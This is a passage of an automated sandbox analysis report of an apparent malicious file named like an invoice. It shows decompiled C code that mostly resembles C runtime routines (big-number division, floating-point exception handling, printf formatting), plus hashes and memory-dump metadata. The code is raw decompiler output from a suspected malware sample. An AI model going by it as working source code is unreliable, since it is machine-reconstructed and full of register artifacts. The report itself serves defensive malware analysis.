                            								}
                            								L22:
                            								__eflags = _t306;
                            								if(__eflags != 0) {
                            									_t330 = _v60;
                            									_t200 = _a8;
                            									_t351 =  *(_t200 + _t330 * 4);
                            									_t64 = _t330 * 4; // 0xffffe9e5
                            									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                            									_v36 = _t201;
                            									asm("bsr eax, esi");
                            									_v56 = _t351;
                            									if(__eflags == 0) {
                            										_t270 = 0x20;
                            									} else {
                            										_t270 = 0x1f - _t201;
                            									}
                            									_v40 = _t270;
                            									_v64 = 0x20 - _t270;
                            									__eflags = _t270;
                            									if(_t270 != 0) {
                            										_t292 = _v40;
                            										_v36 = _v36 << _t292;
                            										_v56 = _t351 << _t292 | _v36 >> _v64;
                            										__eflags = _t330 - 2;
                            										if(_t330 > 2) {
                            											_t79 = _t330 * 4; // 0xe850ffff
                            											_t81 =  &_v36;
                            											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                            											__eflags =  *_t81;
                            										}
                            									}
                            									_v76 = 0;
                            									_t307 = _t306 + 0xffffffff;
                            									__eflags = _t307;
                            									_v32 = _t307;
                            									if(_t307 < 0) {
                            										_t331 = 0;
                            										__eflags = 0;
                            									} else {
                            										_t85 =  &(_t262[1]); // 0x4
                            										_v20 =  &(_t85[_t307]);
                            										_t206 = _t307 + _t330;
                            										_t90 = _t262 - 4; // -4
                            										_v12 = _t206;
                            										_t278 = _t90 + _t206 * 4;
                            										_v80 = _t278;
                            										do {
                            											__eflags = _t206 - _v16;
                            											if(_t206 > _v16) {
                            												_t207 = 0;
                            												__eflags = 0;
                            											} else {
                            												_t207 = _t278[2];
                            											}
                            											__eflags = _v40;
                            											_t311 = _t278[1];
                            											_t279 =  *_t278;
                            											_v52 = _t207;
                            											_v44 = 0;
                            											_v8 = _t207;
                            											_v24 = _t279;
                            											if(_v40 > 0) {
                            												_t318 = _v8;
                            												_t336 = _t279 >> _v64;
                            												_t230 = E0132F280(_t311, _v40, _t318);
                            												_t279 = _v40;
                            												_t207 = _t318;
                            												_t311 = _t336 | _t230;
                            												_t359 = _v24 << _t279;
                            												__eflags = _v12 - 3;
                            												_v8 = _t318;
                            												_v24 = _t359;
                            												if(_v12 >= 3) {
                            													_t279 = _v64;
                            													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                            													__eflags = _t360;
                            													_t207 = _v8;
                            													_v24 = _t360;
                            												}
                            											}
                            											_t208 = E0132F010(_t311, _t207, _v56, 0);
                            											_v44 = _t262;
                            											_t263 = _t208;
                            											_v44 = 0;
                            											_t209 = _t311;
                            											_v8 = _t263;
                            											_v28 = _t209;
                            											_t333 = _t279;
                            											_v72 = _t263;
                            											_v68 = _t209;
                            											__eflags = _t209;
                            											if(_t209 != 0) {
                            												L40:
                            												_t264 = _t263 + 1;
                            												asm("adc eax, 0xffffffff");
                            												_t333 = _t333 + E0132F110(_t264, _t209, _v56, 0);
                            												asm("adc esi, edx");
                            												_t263 = _t264 | 0xffffffff;
                            												_t209 = 0;
                            												__eflags = 0;
                            												_v44 = 0;
                            												_v8 = _t263;
                            												_v72 = _t263;
                            												_v28 = 0;
                            												_v68 = 0;
                            											} else {
                            												__eflags = _t263 - 0xffffffff;
                            												if(_t263 > 0xffffffff) {
                            													goto L40;
                            												}
                            											}
                            											__eflags = 0;
                            											if(0 <= 0) {
                            												if(0 < 0) {
                            													goto L44;
                            												} else {
                            													__eflags = _t333 - 0xffffffff;
                            													if(_t333 <= 0xffffffff) {
                            														while(1) {
                            															L44:
                            															_v8 = _v24;
                            															_t228 = E0132F110(_v36, 0, _t263, _t209);
                            															__eflags = _t311 - _t333;
                            															if(__eflags < 0) {
                            																break;
                            															}
                            															if(__eflags > 0) {
                            																L47:
                            																_t209 = _v28;
                            																_t263 = _t263 + 0xffffffff;
                            																_v72 = _t263;
                            																asm("adc eax, 0xffffffff");
                            																_t333 = _t333 + _v56;
                            																__eflags = _t333;
                            																_v28 = _t209;
                            																asm("adc dword [ebp-0x28], 0x0");
                            																_v68 = _t209;
                            																if(_t333 == 0) {
                            																	__eflags = _t333 - 0xffffffff;
                            																	if(_t333 <= 0xffffffff) {
                            																		continue;
                            																	} else {
                            																	}
                            																}
                            															} else {
                            																__eflags = _t228 - _v8;
                            																if(_t228 <= _v8) {
                            																	break;
                            																} else {
                            																	goto L47;
                            																}
                            															}
                            															L51:
                            															_v8 = _t263;
                            															goto L52;
                            														}
                            														_t209 = _v28;
                            														goto L51;
                            													}
                            												}
                            											}
                            											L52:
                            											__eflags = _t209;
                            											if(_t209 != 0) {
                            												L54:
                            												_t280 = _v60;
                            												_t334 = 0;
                            												_t355 = 0;
                            												__eflags = _t280;
                            												if(_t280 != 0) {
                            													_t266 = _v20;
                            													_t219 =  &(_a8[1]);
                            													__eflags = _t219;
                            													_v24 = _t219;
                            													_v16 = _t280;
                            													do {
                            														_v44 =  *_t219;
                            														_t225 =  *_t266;
                            														_t286 = _t334 + _v72 * _v44;
                            														asm("adc esi, edx");
                            														_t334 = _t355;
                            														_t355 = 0;
                            														__eflags = _t225 - _t286;
                            														if(_t225 < _t286) {
                            															_t334 = _t334 + 1;
                            															asm("adc esi, esi");
                            														}
                            														 *_t266 = _t225 - _t286;
                            														_t266 = _t266 + 4;
                            														_t219 = _v24 + 4;
                            														_t164 =  &_v16;
                            														 *_t164 = _v16 - 1;
                            														__eflags =  *_t164;
                            														_v24 = _t219;
                            													} while ( *_t164 != 0);
                            													_t263 = _v8;
                            													_t280 = _v60;
                            												}
                            												__eflags = 0 - _t355;
                            												if(__eflags <= 0) {
                            													if(__eflags < 0) {
                            														L63:
                            														__eflags = _t280;
                            														if(_t280 != 0) {
                            															_t338 = _t280;
                            															_t314 = _v20;
                            															_t362 =  &(_a8[1]);
                            															__eflags = _t362;
                            															_t265 = 0;
                            															do {
                            																_t282 =  *_t314;
                            																_t172 = _t362 + 4; // 0xa6a5959
                            																_t362 = _t172;
                            																_t314 = _t314 + 4;
                            																asm("adc eax, eax");
                            																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                            																asm("adc eax, 0x0");
                            																_t265 = 0;
                            																_t338 = _t338 - 1;
                            																__eflags = _t338;
                            															} while (_t338 != 0);
                            															_t263 = _v8;
                            														}
                            														_t263 = _t263 + 0xffffffff;
                            														asm("adc dword [ebp-0x18], 0xffffffff");
                            													} else {
                            														__eflags = _v52 - _t334;
                            														if(_v52 < _t334) {
                            															goto L63;
                            														}
                            													}
                            												}
                            												_t213 = _v12 - 1;
                            												__eflags = _t213;
                            												_v16 = _t213;
                            											} else {
                            												__eflags = _t263;
                            												if(_t263 != 0) {
                            													goto L54;
                            												}
                            											}
                            											_t331 = 0 + _t263;
                            											asm("adc esi, 0x0");
                            											_v20 = _v20 - 4;
                            											_t313 = _v32 - 1;
                            											_t262 = _a4;
                            											_t278 = _v80 - 4;
                            											_t206 = _v12 - 1;
                            											_v76 = _t331;
                            											_v32 = _t313;
                            											_v80 = _t278;
                            											_v12 = _t206;
                            											__eflags = _t313;
                            										} while (_t313 >= 0);
                            									}
                            									_t309 = _v16 + 1;
                            									_t204 = _t309;
                            									__eflags = _t204 -  *_t262;
                            									if(_t204 <  *_t262) {
                            										_t191 = _t204 + 1; // 0x132a8bd
                            										_t274 =  &(_t262[_t191]);
                            										do {
                            											 *_t274 = 0;
                            											_t194 =  &(_t274[1]); // 0x91850fc2
                            											_t274 = _t194;
                            											_t204 = _t204 + 1;
                            											__eflags = _t204 -  *_t262;
                            										} while (_t204 <  *_t262);
                            									}
                            									 *_t262 = _t309;
                            									__eflags = _t309;
                            									if(_t309 != 0) {
                            										while(1) {
                            											_t271 =  *_t262;
                            											__eflags = _t262[_t271];
                            											if(_t262[_t271] != 0) {
                            												goto L78;
                            											}
                            											_t272 = _t271 + 0xffffffff;
                            											__eflags = _t272;
                            											 *_t262 = _t272;
                            											if(_t272 != 0) {
                            												continue;
                            											}
                            											goto L78;
                            										}
                            									}
                            									L78:
                            									return _t331;
                            								} else {
                            									goto L23;
                            								}
                            							}
                            						} else {
                            							_t6 =  &(_t328[1]); // 0xfc23b5a
                            							_t295 =  *_t6;
                            							_v44 = _t295;
                            							__eflags = _t295 - 1;
                            							if(_t295 != 1) {
                            								__eflags = _t349;
                            								if(_t349 != 0) {
                            									_t342 = 0;
                            									_v12 = 0;
                            									_v8 = 0;
                            									_v20 = 0;
                            									__eflags = _t349 - 0xffffffff;
                            									if(_t349 != 0xffffffff) {
                            										_t250 = _v16 + 1;
                            										__eflags = _t250;
                            										_v32 = _t250;
                            										_t373 =  &(_t262[_t349 + 1]);
                            										do {
                            											_t253 = E0132F010( *_t373, _t342, _t295, 0);
                            											_v68 = _t303;
                            											_t373 = _t373 - 4;
                            											_v20 = _t262;
                            											_t342 = _t295;
                            											_t303 = 0 + _t253;
                            											asm("adc ecx, 0x0");
                            											_v12 = _t303;
                            											_t34 =  &_v32;
                            											 *_t34 = _v32 - 1;
                            											__eflags =  *_t34;
                            											_v8 = _v12;
                            											_t295 = _v44;
                            										} while ( *_t34 != 0);
                            										_t262 = _a4;
                            									}
                            									_v544 = 0;
                            									_t41 =  &(_t262[1]); // 0x4
                            									_t370 = _t41;
                            									 *_t262 = 0;
                            									E01319BDB(_t370, 0x1cc,  &_v540, 0);
                            									_t247 = _v20;
                            									__eflags = 0 - _t247;
                            									 *_t370 = _t342;
                            									_t262[2] = _t247;
                            									asm("sbb ecx, ecx");
                            									__eflags =  ~0x00000000;
                            									 *_t262 = 0xbadbae;
                            									return _v12;
                            								} else {
                            									_t14 =  &(_t262[1]); // 0x4
                            									_t344 = _t14;
                            									_v544 = 0;
                            									 *_t262 = 0;
                            									E01319BDB(_t344, 0x1cc,  &_v540, 0);
                            									_t256 = _t262[1];
                            									_t322 = _t256 % _v44;
                            									__eflags = 0 - _t322;
                            									 *_t344 = _t322;
                            									asm("sbb ecx, ecx");
                            									__eflags = 0;
                            									 *_t262 =  ~0x00000000;
                            									return _t256 / _v44;
                            								}
                            							} else {
                            								_t9 =  &(_t262[1]); // 0x4
                            								_v544 = _t198;
                            								 *_t262 = _t198;
                            								E01319BDB(_t9, 0x1cc,  &_v540, _t198);
                            								__eflags = 0;
                            								return _t262[1];
                            							}
                            						}
                            					} else {
                            						__eflags = 0;
                            						return 0;
                            					}
                            				} else {
                            					return _t197;
                            				}
                            			}
                            0x0132935f
                            0x01329362
                            0x01329368
                            0x01329368
                            0x013292ed
                            0x013292f0
                            0x013292f4
                            0x013292fa
                            0x01329309
                            0x01329313
                            0x0132931b
                            0x0132931b
                            0x013292eb
                            0x013292c6
                            0x013292c9
                            0x013292cf
                            0x013292cf
                            0x013292b5
                            0x013292bb
                            0x013292bb

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cc7eed304090a535ba91088c2406c7840382efe5eeae5ed94ff06270029249c3
                            • Instruction ID: 46328f26840b3d648e6c74240f6a9c4805aeea19f338496172a008894157a59a
                            • Opcode Fuzzy Hash: cc7eed304090a535ba91088c2406c7840382efe5eeae5ed94ff06270029249c3
                            • Instruction Fuzzy Hash: 9C021B71E002299BDF14DFADC8807ADBBF5FF48328F258169D919E7285D731AA41CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0132E8DF(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                            				signed int _t172;
                            				signed int _t175;
                            				signed int _t178;
                            				signed int* _t179;
                            				signed int _t195;
                            				signed int _t199;
                            				signed int _t202;
                            				void* _t203;
                            				void* _t206;
                            				signed int _t209;
                            				void* _t210;
                            				signed int _t225;
                            				unsigned int* _t240;
                            				signed char _t242;
                            				signed int* _t250;
                            				unsigned int* _t256;
                            				signed int* _t257;
                            				signed char _t259;
                            				long _t262;
                            				signed int* _t265;
                            
                            				 *(_a4 + 4) = 0;
                            				_t262 = 0xc000000d;
                            				 *(_a4 + 8) = 0;
                            				 *(_a4 + 0xc) = 0;
                            				_t242 = _a12;
                            				if((_t242 & 0x00000010) != 0) {
                            					_t262 = 0xc000008f;
                            					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                            				}
                            				if((_t242 & 0x00000002) != 0) {
                            					_t262 = 0xc0000093;
                            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                            				}
                            				if((_t242 & 0x00000001) != 0) {
                            					_t262 = 0xc0000091;
                            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                            				}
                            				if((_t242 & 0x00000004) != 0) {
                            					_t262 = 0xc000008e;
                            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                            				}
                            				if((_t242 & 0x00000008) != 0) {
                            					_t262 = 0xc0000090;
                            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                            				}
                            				_t265 = _a8;
                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                            				_t259 = E0132CA1B(_a4);
                            				if((_t259 & 0x00000001) != 0) {
                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                            				}
                            				if((_t259 & 0x00000004) != 0) {
                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                            				}
                            				if((_t259 & 0x00000008) != 0) {
                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                            				}
                            				if((_t259 & 0x00000010) != 0) {
                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                            				}
                            				if((_t259 & 0x00000020) != 0) {
                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                            				}
                            				_t172 =  *_t265 & 0x00000c00;
                            				if(_t172 == 0) {
                            					 *_a4 =  *_a4 & 0xfffffffc;
                            				} else {
                            					if(_t172 == 0x400) {
                            						_t257 = _a4;
                            						_t225 =  *_t257 & 0xfffffffd | 1;
                            						L26:
                            						 *_t257 = _t225;
                            						L29:
                            						_t175 =  *_t265 & 0x00000300;
                            						if(_t175 == 0) {
                            							_t250 = _a4;
                            							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                            							L35:
                            							 *_t250 = _t178;
                            							L36:
                            							_t179 = _a4;
                            							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                            							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                            							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                            							if(_a28 == 0) {
                            								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                            								 *((long long*)(_a4 + 0x10)) =  *_a20;
                            								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                            								_t254 = _a4;
                            								_t240 = _a24;
                            								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                            								 *(_a4 + 0x50) =  *_t240;
                            							} else {
                            								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                            								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                            								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                            								_t240 = _a24;
                            								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                            								 *(_a4 + 0x50) =  *_t240;
                            							}
                            							E0132C981(_t254);
                            							RaiseException(_t262, 0, 1,  &_a4);
                            							_t256 = _a4;
                            							if((_t256[2] & 0x00000010) != 0) {
                            								 *_t265 =  *_t265 & 0xfffffffe;
                            							}
                            							if((_t256[2] & 0x00000008) != 0) {
                            								 *_t265 =  *_t265 & 0xfffffffb;
                            							}
                            							if((_t256[2] & 0x00000004) != 0) {
                            								 *_t265 =  *_t265 & 0xfffffff7;
                            							}
                            							if((_t256[2] & 0x00000002) != 0) {
                            								 *_t265 =  *_t265 & 0xffffffef;
                            							}
                            							if((_t256[2] & 0x00000001) != 0) {
                            								 *_t265 =  *_t265 & 0xffffffdf;
                            							}
                            							_t195 =  *_t256 & 0x00000003;
                            							if(_t195 == 0) {
                            								 *_t265 =  *_t265 & 0xfffff3ff;
                            							} else {
                            								_t206 = _t195 - 1;
                            								if(_t206 == 0) {
                            									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                            									L55:
                            									 *_t265 = _t209;
                            									L58:
                            									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                            									if(_t199 == 0) {
                            										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                            										L64:
                            										 *_t265 = _t202;
                            										L65:
                            										if(_a28 == 0) {
                            											 *_t240 = _t256[0x14];
                            										} else {
                            											 *_t240 = _t256[0x14];
                            										}
                            										return _t202;
                            									}
                            									_t203 = _t199 - 1;
                            									if(_t203 == 0) {
                            										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                            										goto L64;
                            									}
                            									_t202 = _t203 - 1;
                            									if(_t202 == 0) {
                            										 *_t265 =  *_t265 & 0xfffff3ff;
                            									}
                            									goto L65;
                            								}
                            								_t210 = _t206 - 1;
                            								if(_t210 == 0) {
                            									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                            									goto L55;
                            								}
                            								if(_t210 == 1) {
                            									 *_t265 =  *_t265 | 0x00000c00;
                            								}
                            							}
                            							goto L58;
                            						}
                            						if(_t175 == 0x200) {
                            							_t250 = _a4;
                            							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                            							goto L35;
                            						}
                            						if(_t175 == 0x300) {
                            							 *_a4 =  *_a4 & 0xffffffe3;
                            						}
                            						goto L36;
                            					}
                            					if(_t172 == 0x800) {
                            						_t257 = _a4;
                            						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                            						goto L26;
                            					}
                            					if(_t172 == 0xc00) {
                            						 *_a4 =  *_a4 | 0x00000003;
                            					}
                            				}
                            			}


                            APIs
                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0132E8DA,?,?,00000008,?,?,0132E57A,00000000), ref: 0132EB0C
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ExceptionRaise
                            • String ID:
                            • API String ID: 3997070919-0
                            • Opcode ID: f7a939b84d2b81a7d0db40aa0b4c8b6c7118749d898c3aa0e79022cf669e88cd
                            • Instruction ID: e680c4861329298bf0e630dc0037fd99bfa7232d553f2c3d16c2c1a3e8bc8656
                            • Opcode Fuzzy Hash: f7a939b84d2b81a7d0db40aa0b4c8b6c7118749d898c3aa0e79022cf669e88cd
                            • Instruction Fuzzy Hash: 6BB14B316106199FEB15DF2CC486B647FE0FF05368F298669E99ACF2A1C335E981CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E0131B912(void* __ecx) {
                            				char _v6;
                            				char _v8;
                            				void* __ebx;
                            				void* __edi;
                            				char _t49;
                            				signed int _t50;
                            				void* _t51;
                            				signed char _t54;
                            				signed char _t56;
                            				signed int _t57;
                            				signed int _t58;
                            				signed char _t67;
                            				signed char _t69;
                            				signed char _t71;
                            				signed char _t80;
                            				signed char _t82;
                            				signed int _t84;
                            				signed int _t86;
                            				signed int _t87;
                            				signed char _t92;
                            				void* _t95;
                            				intOrPtr _t100;
                            				unsigned int _t102;
                            				signed char _t104;
                            				void* _t112;
                            				unsigned int _t113;
                            				void* _t114;
                            				signed int _t115;
                            				signed int* _t116;
                            				void* _t119;
                            				void* _t121;
                            				void* _t122;
                            				void* _t124;
                            				void* _t125;
                            
                            				_push(__ecx);
                            				_t119 = __ecx;
                            				_t92 = 1;
                            				_t49 =  *((char*)(__ecx + 0x31));
                            				_t124 = _t49 - 0x64;
                            				if(_t124 > 0) {
                            					__eflags = _t49 - 0x70;
                            					if(__eflags > 0) {
                            						_t50 = _t49 - 0x73;
                            						__eflags = _t50;
                            						if(_t50 == 0) {
                            							L9:
                            							_t51 = E0131C500(_t119);
                            							L10:
                            							if(_t51 != 0) {
                            								__eflags =  *((char*)(_t119 + 0x30));
                            								if( *((char*)(_t119 + 0x30)) == 0) {
                            									_t113 =  *(_t119 + 0x20);
                            									_push(_t114);
                            									_v8 = 0;
                            									_t115 = 0;
                            									_v6 = 0;
                            									_t54 = _t113 >> 4;
                            									__eflags = _t92 & _t54;
                            									if((_t92 & _t54) == 0) {
                            										L46:
                            										_t100 =  *((intOrPtr*)(_t119 + 0x31));
                            										__eflags = _t100 - 0x78;
                            										if(_t100 == 0x78) {
                            											L48:
                            											_t56 = _t113 >> 5;
                            											__eflags = _t92 & _t56;
                            											if((_t92 & _t56) != 0) {
                            												L50:
                            												__eflags = _t100 - 0x61;
                            												if(_t100 == 0x61) {
                            													L53:
                            													_t57 = 1;
                            													L54:
                            													__eflags = _t92;
                            													if(_t92 != 0) {
                            														L56:
                            														 *((char*)(_t121 + _t115 - 4)) = 0x30;
                            														__eflags = _t100 - 0x58;
                            														if(_t100 == 0x58) {
                            															L59:
                            															_t58 = 1;
                            															L60:
                            															__eflags = _t58;
                            															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                            															_t115 = _t115 + 2;
                            															__eflags = _t115;
                            															L61:
                            															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
                            															__eflags = _t113 & 0x0000000c;
                            															if((_t113 & 0x0000000c) == 0) {
                            																E0131ADDC(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
                            																_t122 = _t122 + 0x10;
                            															}
                            															E0131C7E0(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
                            															_t102 =  *(_t119 + 0x20);
                            															_t116 = _t119 + 0x18;
                            															_t67 = _t102 >> 3;
                            															__eflags = _t67 & 0x00000001;
                            															if((_t67 & 0x00000001) != 0) {
                            																_t104 = _t102 >> 2;
                            																__eflags = _t104 & 0x00000001;
                            																if((_t104 & 0x00000001) == 0) {
                            																	E0131ADDC(_t119 + 0x448, 0x30, _t95, _t116);
                            																	_t122 = _t122 + 0x10;
                            																}
                            															}
                            															E0131C6AE(_t119, 0);
                            															__eflags =  *_t116;
                            															if( *_t116 >= 0) {
                            																_t71 =  *(_t119 + 0x20) >> 2;
                            																__eflags = _t71 & 0x00000001;
                            																if((_t71 & 0x00000001) != 0) {
                            																	E0131ADDC(_t119 + 0x448, 0x20, _t95, _t116);
                            																}
                            															}
                            															_t69 = 1;
                            															L70:
                            															return _t69;
                            														}
                            														__eflags = _t100 - 0x41;
                            														if(_t100 == 0x41) {
                            															goto L59;
                            														}
                            														_t58 = 0;
                            														goto L60;
                            													}
                            													__eflags = _t57;
                            													if(_t57 == 0) {
                            														goto L61;
                            													}
                            													goto L56;
                            												}
                            												__eflags = _t100 - 0x41;
                            												if(_t100 == 0x41) {
                            													goto L53;
                            												}
                            												_t57 = 0;
                            												goto L54;
                            											}
                            											L49:
                            											_t92 = 0;
                            											__eflags = 0;
                            											goto L50;
                            										}
                            										__eflags = _t100 - 0x58;
                            										if(_t100 != 0x58) {
                            											goto L49;
                            										}
                            										goto L48;
                            									}
                            									_t80 = _t113 >> 6;
                            									__eflags = _t92 & _t80;
                            									if((_t92 & _t80) == 0) {
                            										__eflags = _t92 & _t113;
                            										if((_t92 & _t113) == 0) {
                            											_t82 = _t113 >> 1;
                            											__eflags = _t92 & _t82;
                            											if((_t92 & _t82) == 0) {
                            												goto L46;
                            											}
                            											_v8 = 0x20;
                            											L45:
                            											_t115 = _t92;
                            											goto L46;
                            										}
                            										_v8 = 0x2b;
                            										goto L45;
                            									}
                            									_v8 = 0x2d;
                            									goto L45;
                            								}
                            								_t69 = _t92;
                            								goto L70;
                            							}
                            							L11:
                            							_t69 = 0;
                            							goto L70;
                            						}
                            						_t84 = _t50;
                            						__eflags = _t84;
                            						if(__eflags == 0) {
                            							L28:
                            							_push(0);
                            							_push(0xa);
                            							L29:
                            							_t51 = E0131C30B(_t119, _t114, __eflags);
                            							goto L10;
                            						}
                            						__eflags = _t84 - 3;
                            						if(__eflags != 0) {
                            							goto L11;
                            						}
                            						_push(0);
                            						L13:
                            						_push(0x10);
                            						goto L29;
                            					}
                            					if(__eflags == 0) {
                            						_t51 = E0131C4E8(__ecx);
                            						goto L10;
                            					}
                            					__eflags = _t49 - 0x67;
                            					if(_t49 <= 0x67) {
                            						L30:
                            						_t51 = E0131BF17(_t92, _t119, _t112);
                            						goto L10;
                            					}
                            					__eflags = _t49 - 0x69;
                            					if(_t49 == 0x69) {
                            						L27:
                            						_t2 = _t119 + 0x20;
                            						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
                            						__eflags =  *_t2;
                            						goto L28;
                            					}
                            					__eflags = _t49 - 0x6e;
                            					if(_t49 == 0x6e) {
                            						_t51 = E0131C455(__ecx, _t112);
                            						goto L10;
                            					}
                            					__eflags = _t49 - 0x6f;
                            					if(_t49 != 0x6f) {
                            						goto L11;
                            					}
                            					_t51 = E0131C4C9(__ecx);
                            					goto L10;
                            				}
                            				if(_t124 == 0) {
                            					goto L27;
                            				}
                            				_t125 = _t49 - 0x58;
                            				if(_t125 > 0) {
                            					_t86 = _t49 - 0x5a;
                            					__eflags = _t86;
                            					if(_t86 == 0) {
                            						_t51 = E0131BE51(__ecx);
                            						goto L10;
                            					}
                            					_t87 = _t86 - 7;
                            					__eflags = _t87;
                            					if(_t87 == 0) {
                            						goto L30;
                            					}
                            					__eflags = _t87;
                            					if(__eflags != 0) {
                            						goto L11;
                            					}
                            					L17:
                            					_t51 = E0131C1E3(_t92, _t119, __eflags, 0);
                            					goto L10;
                            				}
                            				if(_t125 == 0) {
                            					_push(1);
                            					goto L13;
                            				}
                            				if(_t49 == 0x41) {
                            					goto L30;
                            				}
                            				if(_t49 == 0x43) {
                            					goto L17;
                            				}
                            				if(_t49 <= 0x44) {
                            					goto L11;
                            				}
                            				if(_t49 <= 0x47) {
                            					goto L30;
                            				}
                            				if(_t49 != 0x53) {
                            					goto L11;
                            				}
                            				goto L9;
                            			}






































                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0
                            • API String ID: 0-4108050209
                            • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                            • Instruction ID: 7f8ba84c2df4d29d04c18b193ee4c309c0fb2fd6757eabc39b74cfdd3333e708
                            • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                            • Instruction Fuzzy Hash: 0251B07224474A5BFF3D592C8894BBFEBBB9B1220DF08040ADA82D769ED615D607C351
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01328587() {
                            				signed int _t3;
                            
                            				_t3 = GetProcessHeap();
                            				 *0x134655c = _t3;
                            				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                            			}




                            0x01328587
                            0x0132858f
                            0x01328597

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
